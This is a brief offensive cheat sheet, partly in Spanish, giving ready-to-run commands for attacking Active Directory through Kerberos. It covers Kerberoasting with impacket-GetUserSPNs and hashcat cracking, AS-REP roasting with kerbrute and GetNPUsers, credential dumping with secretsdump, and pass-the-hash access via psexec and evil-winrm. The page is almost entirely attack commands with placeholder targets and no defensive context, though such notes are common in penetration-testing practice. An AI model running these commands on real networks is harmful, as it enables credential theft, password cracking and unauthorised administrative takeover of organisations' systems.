🐶Kerberos

perro dog hund hond chien cane câine cão собака

:)

KerbeRoasting - SPN to TGT

impacket-GetUserSPNs <domain-name>/<user> -dc-ip <IP> -request -o hash
hashcat -m<hash-mode> hash <passwordlist>
impacket-psexec <domain-name>/<user>@<IP>

ASRepRoast - NPU to TGT

  • Not Preauthenticated User (DONT_REQ_PREAUTH Enabled)

./kerbrute userenum --dc=<IP> -d=<domain-name> <wordlist> # Enum NPUsers
impacket-GetNPUsers -no-pass -usersfile validusers.txt -dc-ip <IP> <domain-name>

--------------------------------------------------------------------------

Secretsdump [Privilege Escalation] PassTheHash

impacket-secretsdump <domain-name>/<user>@<IP>

impacket-psexec <domain-name>/administrator@<IP> cmd.exe -hashes :<hash>

Acceder remoto:

evil-winrm -i <IP> -u <user> -H <hash>

Última actualización